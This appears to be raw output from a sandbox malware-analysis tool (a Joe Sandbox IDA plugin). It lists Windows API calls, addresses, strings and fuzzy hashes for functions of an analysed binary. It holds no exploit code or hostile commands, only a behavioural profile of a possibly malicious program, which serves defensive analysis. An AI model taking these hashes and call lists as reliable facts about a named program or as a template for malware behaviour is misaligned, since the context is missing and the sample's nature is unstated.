                                    • String ID: X
                                    • API String ID: 83654149-3081909835
                                    • Opcode ID: 5fe59f8ef31837d4c4f043b48f85cc89f72d4a00aa00529b0c00a09c0e8c68af
                                    • Instruction ID: 4865408771858d441af6907bcc206fae20007cabb6120698286b85dd6d0a66fc
                                    • Opcode Fuzzy Hash: 5fe59f8ef31837d4c4f043b48f85cc89f72d4a00aa00529b0c00a09c0e8c68af
                                    • Instruction Fuzzy Hash: 8BE19031508340DFC714EF24C485B6AB7E4BF85314F14896DEA899B3A2DB39DD05CB92
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • BeginPaint.USER32(?,?,?), ref: 00799241
                                    • GetWindowRect.USER32(?,?), ref: 007992A5
                                    • ScreenToClient.USER32(?,?), ref: 007992C2
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007992D3
                                    • EndPaint.USER32(?,?,?,?,?), ref: 00799321
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007D71EA
                                      • Part of subcall function 00799339: BeginPath.GDI32(00000000), ref: 00799357
                                    Similarity
                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 3050599898-0
                                    • Opcode ID: eb8644763b07ba35a5a997c043b7ee77cd92f61adb4abe39d4d9034a7dd82084
                                    • Instruction ID: 556829f5efc4f124e7bb6cda846bc49ff18024c848771aab0dd667c5390ab5ad
                                    • Opcode Fuzzy Hash: eb8644763b07ba35a5a997c043b7ee77cd92f61adb4abe39d4d9034a7dd82084
                                    • Instruction Fuzzy Hash: D1418E70104300AFEB21DF28D889FAA7BB8FF96321F14062DFA55872A1D7399845DB61
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007F080C
                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 007F0847
                                    • EnterCriticalSection.KERNEL32(?), ref: 007F0863
                                    • LeaveCriticalSection.KERNEL32(?), ref: 007F08DC
                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007F08F3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007F0921
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                    • String ID:
                                    • API String ID: 3368777196-0
                                    • Opcode ID: 3d1e2b3a1e6c00954d48f944169e00b13125695227cb71ffc03be1105c8c90f1
                                    • Instruction ID: f84495ec35bf395502262af37dcb079ec3ccbdd5d8c8c1d3800752f24fb0e3dd
                                    • Opcode Fuzzy Hash: 3d1e2b3a1e6c00954d48f944169e00b13125695227cb71ffc03be1105c8c90f1
                                    • Instruction Fuzzy Hash: 6A416D71900209EBDF14EF64DC85AAA7779FF04310F1480A9ED00DA297D734DE55DBA4
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,007DF3AB,00000000,?,?,00000000,?,007D682C,00000004,00000000,00000000), ref: 0081824C
                                    • EnableWindow.USER32(00000000,00000000), ref: 00818272
                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008182D1
                                    • ShowWindow.USER32(00000000,00000004), ref: 008182E5
                                    • EnableWindow.USER32(00000000,00000001), ref: 0081830B
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0081832F
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: 2867db6b6dbb506b0497af30291541b9d2c8d50c98efa924a9571311ebd8e10a
                                    • Instruction ID: 7d4843bfd7a1503ec86797b320e2c485c65034cf9979fc420d9e174d68418cc2
                                    • Opcode Fuzzy Hash: 2867db6b6dbb506b0497af30291541b9d2c8d50c98efa924a9571311ebd8e10a
                                    • Instruction Fuzzy Hash: FD41C574601644EFDF22CF24C89ABE47BE9FF0A715F184169E518CB2A2CB71AC81CB50
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 007E4C95
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007E4CB2
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007E4CEA
                                    • _wcslen.LIBCMT ref: 007E4D08
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007E4D10
                                    • _wcsstr.LIBVCRUNTIME ref: 007E4D1A
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                    • String ID:
                                    • API String ID: 72514467-0
                                    • Opcode ID: 2b32e860ec27f52c4507748674d2bb3dd8b4de49af3aaa30ca1701840d803ad2
                                    • Instruction ID: aef843fefe4add484b2493a204f82134dcd8a83d6695defd50644ed33f563cb1
                                    • Opcode Fuzzy Hash: 2b32e860ec27f52c4507748674d2bb3dd8b4de49af3aaa30ca1701840d803ad2
                                    • Instruction Fuzzy Hash: 6A210B72305240BBEB159B3AEC49E7B7BACDF49750F10807DF905CB192EA69DC4196A0
                                    APIs
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                    • _wcslen.LIBCMT ref: 007F587B
                                    • CoInitialize.OLE32(00000000), ref: 007F5995
                                    • CoCreateInstance.OLE32(0081FCF8,00000000,00000001,0081FB68,?), ref: 007F59AE
                                    • CoUninitialize.OLE32 ref: 007F59CC
                                    Strings
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 3172280962-24824748
                                    • Opcode ID: 89d70eb35f06add34e2b29c78e07a77051009c6c15f7027e94280ee1d0ce692a
                                    • Instruction ID: 3503cb9eee769958970ca5cb92dd972ec969b2f79da2a29f924c408807cba951
                                    • Opcode Fuzzy Hash: 89d70eb35f06add34e2b29c78e07a77051009c6c15f7027e94280ee1d0ce692a
                                    • Instruction Fuzzy Hash: 19D17471608605DFC718EF24C48492ABBE5FF89720F14885DFA8A9B361D739EC45CB92
                                    APIs
                                      • Part of subcall function 007E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007E0FCA
                                      • Part of subcall function 007E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007E0FD6
                                      • Part of subcall function 007E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007E0FE5
                                      • Part of subcall function 007E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007E0FEC
                                      • Part of subcall function 007E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007E1002
                                    • GetLengthSid.ADVAPI32(?,00000000,007E1335), ref: 007E17AE
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007E17BA
                                    • HeapAlloc.KERNEL32(00000000), ref: 007E17C1
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 007E17DA
                                    • GetProcessHeap.KERNEL32(00000000,00000000,007E1335), ref: 007E17EE
                                    • HeapFree.KERNEL32(00000000), ref: 007E17F5
                                    Similarity
                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 3008561057-0
                                    • Opcode ID: ee76fd2363495920f5e98c98bcb0c7052b87c509afdc8d699f2d9fbf7cd3fcea
                                    • Instruction ID: 120f4978f2041391f28a91fcd14299b55cd2c4eecfd969059e338ebdb1293698
                                    • Opcode Fuzzy Hash: ee76fd2363495920f5e98c98bcb0c7052b87c509afdc8d699f2d9fbf7cd3fcea
                                    • Instruction Fuzzy Hash: 71117C31586605FFDB109FA5CC4ABAE7BA9FF49755F508018F481D7210D739A944CB60
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007E14FF
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 007E1506
                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007E1515
                                    • CloseHandle.KERNEL32(00000004), ref: 007E1520
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007E154F
                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 007E1563
                                    Similarity
                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1413079979-0
                                    • Opcode ID: 51f1606c400cd528eb2d62c97bb07aba6f7fd856fc22960253ba4fd7b2d66e24
                                    • Instruction ID: b4a108b8918042661b29804b40daea991d66c5a56121173c867433a6169cabfd
                                    • Opcode Fuzzy Hash: 51f1606c400cd528eb2d62c97bb07aba6f7fd856fc22960253ba4fd7b2d66e24
                                    • Instruction Fuzzy Hash: CB112972541249ABDF118F99ED4ABDE7BADFF49744F048015FA05A21A0C3758E60DB60
                                    APIs
                                    • GetLastError.KERNEL32(?,?,007A3379,007A2FE5), ref: 007A3390
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007A339E
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007A33B7
                                    • SetLastError.KERNEL32(00000000,?,007A3379,007A2FE5), ref: 007A3409
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 2d39ece88335c42a5e6ea25ab495fae9d22efabf01bc47fb7e1e010741623a53
                                    • Instruction ID: 8e9ac86b5d8c51369a17be6580f37865705d8cd993d16f62c27cc146e8621414
                                    • Opcode Fuzzy Hash: 2d39ece88335c42a5e6ea25ab495fae9d22efabf01bc47fb7e1e010741623a53
                                    • Instruction Fuzzy Hash: EC01473360E711FEAA642F747C896672A98FB873793200329F420842F0EF194D019544
                                    APIs
                                    • GetLastError.KERNEL32(?,?,007B5686,007C3CD6,?,00000000,?,007B5B6A,?,?,?,?,?,007AE6D1,?,00848A48), ref: 007B2D78
                                    • _free.LIBCMT ref: 007B2DAB
                                    • _free.LIBCMT ref: 007B2DD3
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,007AE6D1,?,00848A48,00000010,00784F4A,?,?,00000000,007C3CD6), ref: 007B2DE0
                                    • SetLastError.KERNEL32(00000000,?,?,?,?,007AE6D1,?,00848A48,00000010,00784F4A,?,?,00000000,007C3CD6), ref: 007B2DEC
                                    • _abort.LIBCMT ref: 007B2DF2
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: f56f56271d2b4901936d039be28887b5bade5aac5c8916a3d610b4336e46fad5
                                    • Instruction ID: 3adb75f0d09b3ae3d9dde2c55250335300b24cf4557b658494efbba594dd079b
                                    • Opcode Fuzzy Hash: f56f56271d2b4901936d039be28887b5bade5aac5c8916a3d610b4336e46fad5
                                    • Instruction Fuzzy Hash: 3FF0A435647600B7C6523738AC0EBDA2959BFC67A1B244518F824D22A7EE2C98434161
                                    APIs
                                      • Part of subcall function 00799639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00799693
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996A2
                                      • Part of subcall function 00799639: BeginPath.GDI32(?), ref: 007996B9
                                      • Part of subcall function 00799639: SelectObject.GDI32(?,00000000), ref: 007996E2
                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00818A4E
                                    • LineTo.GDI32(?,00000003,00000000), ref: 00818A62
                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00818A70
                                    • LineTo.GDI32(?,00000000,00000003), ref: 00818A80
                                    • EndPath.GDI32(?), ref: 00818A90
                                    • StrokePath.GDI32(?), ref: 00818AA0
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    • Opcode ID: d1cba877b65e93c671590079250a7cc7496ce7c146d05b7839c79ed5e11f6ab5
                                    • Instruction ID: 5267d95a29fc3b52ad25ced387e0436af45c818341df214496a72cf2fbb94d3a
                                    • Opcode Fuzzy Hash: d1cba877b65e93c671590079250a7cc7496ce7c146d05b7839c79ed5e11f6ab5
                                    • Instruction Fuzzy Hash: 2411E576040118FFEF129F94DC88EEA7F6CFF08350F008012BA199A1A1C7719D559BA0
                                    APIs
                                    • GetDC.USER32(00000000), ref: 007E5218
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 007E5229
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E5230
                                    • ReleaseDC.USER32(00000000,00000000), ref: 007E5238
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007E524F
                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 007E5261
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    • Opcode ID: 712e549609aceec8efc81ca8d5ab21f0f7d000f1951e5d5f3fe0aa30edad33b3
                                    • Instruction ID: fc02b53da11ef35fe007906f8d3fec6e643390f6a81dbd53e2633dd96188e52c
                                    • Opcode Fuzzy Hash: 712e549609aceec8efc81ca8d5ab21f0f7d000f1951e5d5f3fe0aa30edad33b3
                                    • Instruction Fuzzy Hash: AA014475A41718BBEB105BA69C49A9EBF7CFF48751F048065FA05A7281D6709900CB60
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00781BF4
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00781BFC
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00781C07
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00781C12
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00781C1A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00781C22
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    • Opcode ID: c80b7809455a1e28a9b71805129483661e6b3f00eea51d9f2d79ff478958fcd8
                                    • Instruction ID: eba186609f3e962120792898c12f74615f7dfeaa0bf19958d69fe6db23b940ac
                                    • Opcode Fuzzy Hash: c80b7809455a1e28a9b71805129483661e6b3f00eea51d9f2d79ff478958fcd8
                                    • Instruction Fuzzy Hash: 0D0167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007EEB30
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007EEB46
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 007EEB55
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007EEB64
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007EEB6E
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007EEB75
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 81edfa42eaaf761ff44c0b7b1f0cb1b3904349aa807b6416ee7955c987a632cb
                                    • Instruction ID: a019250069e2e6142e2eccd2e31bb30ebb1a9c737acc278e2094e87afa350f01
                                    • Opcode Fuzzy Hash: 81edfa42eaaf761ff44c0b7b1f0cb1b3904349aa807b6416ee7955c987a632cb
                                    • Instruction Fuzzy Hash: 2CF03AB2681168BBE7215B62AC0EEEF7A7CFFCAB11F008159F611D1191E7A05A01C6B5
                                    APIs
                                    • GetClientRect.USER32(?), ref: 007D7452
                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 007D7469
                                    • GetWindowDC.USER32(?), ref: 007D7475
                                    • GetPixel.GDI32(00000000,?,?), ref: 007D7484
                                    • ReleaseDC.USER32(?,00000000), ref: 007D7496
                                    • GetSysColor.USER32(00000005), ref: 007D74B0
                                    Similarity
                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                    • String ID:
                                    • API String ID: 272304278-0
                                    • Opcode ID: 1db144f43b24bd0ab1a5a08ae3dd899e30737c077f01cc459f629284cc8a93f1
                                    • Instruction ID: 637874e353f9bcb13119fd88056ebf5aef8134a8874f01a56e41e24462acb3d7
                                    • Opcode Fuzzy Hash: 1db144f43b24bd0ab1a5a08ae3dd899e30737c077f01cc459f629284cc8a93f1
                                    • Instruction Fuzzy Hash: 0D016931440215FFEB515FA4DC08BEA7FBAFF04321F618169FA16A22A1DB351E51EB50
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007E187F
                                    • UnloadUserProfile.USERENV(?,?), ref: 007E188B
                                    • CloseHandle.KERNEL32(?), ref: 007E1894
                                    • CloseHandle.KERNEL32(?), ref: 007E189C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E18A5
                                    • HeapFree.KERNEL32(00000000), ref: 007E18AC
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                    • String ID:
                                    • API String ID: 146765662-0
                                    • Opcode ID: e88199ca09dffe17241728a6e194341b1d05a6436b0420327fa6c3d7b125f7ca
                                    • Instruction ID: 0f7053261804d1aca69a8d217167651c53ec18b5632d6144a04b689877fe2748
                                    • Opcode Fuzzy Hash: e88199ca09dffe17241728a6e194341b1d05a6436b0420327fa6c3d7b125f7ca
                                    • Instruction Fuzzy Hash: A0E0E536484211BBDB015FA5ED0C98AFF3EFF49B22B10C620F225811B0CB729420DF50
                                    APIs
                                      • Part of subcall function 007A0242: EnterCriticalSection.KERNEL32(0085070C,00851884,?,?,0079198B,00852518,?,?,?,007812F9,00000000), ref: 007A024D
                                      • Part of subcall function 007A0242: LeaveCriticalSection.KERNEL32(0085070C,?,0079198B,00852518,?,?,?,007812F9,00000000), ref: 007A028A
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007A00A3: __onexit.LIBCMT ref: 007A00A9
                                    • __Init_thread_footer.LIBCMT ref: 00807BFB
                                      • Part of subcall function 007A01F8: EnterCriticalSection.KERNEL32(0085070C,?,?,00798747,00852514), ref: 007A0202
                                      • Part of subcall function 007A01F8: LeaveCriticalSection.KERNEL32(0085070C,?,00798747,00852514), ref: 007A0235
                                    Strings
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                    • String ID: +T}$5$G$Variable must be of type 'Object'.
                                    • API String ID: 535116098-1770635527
                                    • Opcode ID: 401dd77fa7a70495e2296030cd19cfda737dc0792e272fa2059512c18efd72eb
                                    • Instruction ID: 5f8363072354253fde8732fe9dedc6346d8db33829732c5f37a0d08ce17d2c09
                                    • Opcode Fuzzy Hash: 401dd77fa7a70495e2296030cd19cfda737dc0792e272fa2059512c18efd72eb
                                    • Instruction Fuzzy Hash: D9919C70A04209EFCB54EF98D8959BDB7B1FF49304F148049F8069B292DB35AE45CB61
                                    APIs
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007EC6EE
                                    • _wcslen.LIBCMT ref: 007EC735
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007EC79C
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007EC7CA
                                    Strings
                                    Similarity
                                    • API ID: ItemMenu$Info_wcslen$Default
                                    • String ID: 0
                                    • API String ID: 1227352736-4108050209
                                    • Opcode ID: 4aab43c6cc36530ce582ba5c41a2235678f3e67de71dd4e5443487caabd288b0
                                    • Instruction ID: 509410470a1e7eaa39ffd5020c65a1e3bd3c6ac946806fb7963e9aa63f4d2568
                                    • Opcode Fuzzy Hash: 4aab43c6cc36530ce582ba5c41a2235678f3e67de71dd4e5443487caabd288b0
                                    • Instruction Fuzzy Hash: 6751F5756063809BD7129F2AC889B6B7BE8EF4D310F040A2DF995D3190DB78DC06CB52
                                    APIs
                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0080AEA3
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                    • GetProcessId.KERNEL32(00000000), ref: 0080AF38
                                    • CloseHandle.KERNEL32(00000000), ref: 0080AF67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                    • String ID: <$@
                                    • API String ID: 146682121-1426351568
                                    • Opcode ID: 7e5128f519c30ffa695d0e9fbc8d4b0a7f837651bb726d9e5bc21e10bf440f60
                                    • Instruction ID: 469af3aaacb2ed6b7cab7ec1674c3ef6c9bcf7e277651d8c6b5e57ee59ca2c29
                                    • Opcode Fuzzy Hash: 7e5128f519c30ffa695d0e9fbc8d4b0a7f837651bb726d9e5bc21e10bf440f60
                                    • Instruction Fuzzy Hash: D5718D75A00619DFCB18EF54C888A9EBBF0FF08314F148499E816AB392CB74ED41CB91
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007E7206
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007E723C
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007E724D
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007E72CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 4a98c7f0b4897195c14c70c2f6ae250ab42a4d4e4a843cc60b7e3df02b15f736
                                    • Instruction ID: 2a0a03627789c6abb4abe645ffdcddc75426e8714111c7a51c5d57049ad11427
                                    • Opcode Fuzzy Hash: 4a98c7f0b4897195c14c70c2f6ae250ab42a4d4e4a843cc60b7e3df02b15f736
                                    • Instruction Fuzzy Hash: 08418F71605245EFDB19CF55C884A9A7BBDFF49310F1480A9BE05DF20AD7B8D944CBA0
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00813E35
                                    • IsMenu.USER32(?), ref: 00813E4A
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00813E92
                                    • DrawMenuBar.USER32 ref: 00813EA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert
                                    • String ID: 0
                                    • API String ID: 3076010158-4108050209
                                    • Opcode ID: ac1c75919fe4e0681924431417488b0feee7e6050ca18d8990ee0c1465e6d2dd
                                    • Instruction ID: 13493073faa80ea388fae3745d7e76e76c387f5544d20427eea838dd4f083399
                                    • Opcode Fuzzy Hash: ac1c75919fe4e0681924431417488b0feee7e6050ca18d8990ee0c1465e6d2dd
                                    • Instruction Fuzzy Hash: D1413675A00309EFDF10DF50D884AEABBB9FF49354F048129E905E7690D734AE84CB50
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007E1E66
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007E1E79
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 007E1EA9
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$_wcslen$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 2081771294-1403004172
                                    • Opcode ID: 0aacd2984041e383a27a20d773c3f8b8f402da36c096a7835ffcc673d9efb1fe
                                    • Instruction ID: f2260038ea7f3f6eeffa3006144077bd3afff2dd12b17a0b9d9ebd9e79443119
                                    • Opcode Fuzzy Hash: 0aacd2984041e383a27a20d773c3f8b8f402da36c096a7835ffcc673d9efb1fe
                                    • Instruction Fuzzy Hash: 832123B1A41144BFDB14AB71DC4ACFFB7B8EF49360B584119F821A32E1DB3C49098720
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: HKEY_LOCAL_MACHINE$HKLM
                                    • API String ID: 176396367-4004644295
                                    • Opcode ID: 96bed2c23a6a4fe40ce0caed994bc23b3d1ee9c6795c9cf4c75be76fa969677f
                                    • Instruction ID: d997677222557fb0b19baac5903f75a444713f62c52844e426e7bdb4dd371860
                                    • Opcode Fuzzy Hash: 96bed2c23a6a4fe40ce0caed994bc23b3d1ee9c6795c9cf4c75be76fa969677f
                                    • Instruction Fuzzy Hash: BC31D5B2B0017A8BCB60EF6C9C505BF3392FBA1750B154229E855EB3C5E675CD4493A0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00812F8D
                                    • LoadLibraryW.KERNEL32(?), ref: 00812F94
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00812FA9
                                    • DestroyWindow.USER32(?), ref: 00812FB1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
